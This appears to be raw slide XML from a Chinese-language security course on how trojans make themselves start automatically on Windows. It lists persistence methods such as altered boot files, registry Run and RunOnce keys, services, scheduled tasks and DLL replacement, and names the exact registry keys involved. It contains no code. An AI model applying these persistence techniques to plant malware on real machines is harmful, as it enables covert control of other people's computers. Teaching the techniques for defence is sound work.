          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动加载技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63494" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573088" y="1392238"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马程序在被植入目标主机后，不可能寄希望于用户双击其图标来运行启动，只能不动声色地自动启动和运行，攻击才能以此为依据侵入被侵主机，完成控制。</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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动加载技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64518" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649288" y="1268412"/>
            <a:ext cx="7772400" cy="5056187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统中木马程序的自动加载技术主要有：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>修改系统文件 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>修改系统注册表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>添加系统服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>修改文件打开关联属性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>修改任务计划</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>修改组策略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>利用系统自动运行的程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>修改启动文件夹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>替换系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DLL</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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改系统文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65542" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551477" y="1256379"/>
            <a:ext cx="7848600" cy="4937944"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>木马程序一般会在第一次运行时，修改目标系统文件以达到自动加载的目的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>在早于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Windwos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>版本的系统上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>System.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Win.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Winstart.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Autoexec.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>等都是木马所关注的配置文件。这些文件能自动被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>在启动时加载运行，木马将自身程序加入此类批处理文件，能够达成开机启动的目标。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这些文件虽然在后续版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统上依然存在，但主要出于兼容早期系统的需要，很难再被木马继续利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改系统注册表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66566" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="1318496"/>
            <a:ext cx="7772400" cy="5067555"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统注册表保存着系统的软件、硬件及其它与系统配置有关的重要信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WinNT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>系列操作系统上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>主要使用注册表存储包括开机启动项目的系统配置，修改注册表隐蔽性相对较高，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马常常采用这种方法实现开机自启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。通常被攻击者用作开机启动的主键（在不同版本的系统中可能存在不同的主键）包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12191981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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改系统注册表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66566" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330968" y="1278705"/>
            <a:ext cx="8267341" cy="5067555"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统注册表保存着系统的软件、硬件及其它与系统配置有关的重要信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> \Software\Microsoft\Windows\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Runonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunonceEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>（在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Win2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>WinXp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>中有效）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HKEY_CURRENT_USER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Runonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunonceEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HKEY_USERS\[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>UserSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>]\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Runonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunonceEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="圆角矩形标注 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3731343" y="4552447"/>
            <a:ext cx="3982064" cy="1793813"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45698"/>
              <a:gd name="adj2" fmla="val -63720"/>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just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>在上述主键中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>对当前系统的所有用户有效，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>HKEY_CURRENT_USER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>仅对当前登陆的用户有效</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="just"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dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>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1777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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改系统注册表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66566" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330968" y="1278705"/>
            <a:ext cx="8267341" cy="5067555"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统注册表保存着系统的软件、硬件及其它与系统配置有关的重要信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE \Software\Microsoft\Windows\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Runonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunonceEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>（在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Win2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>WinXp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>中有效）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
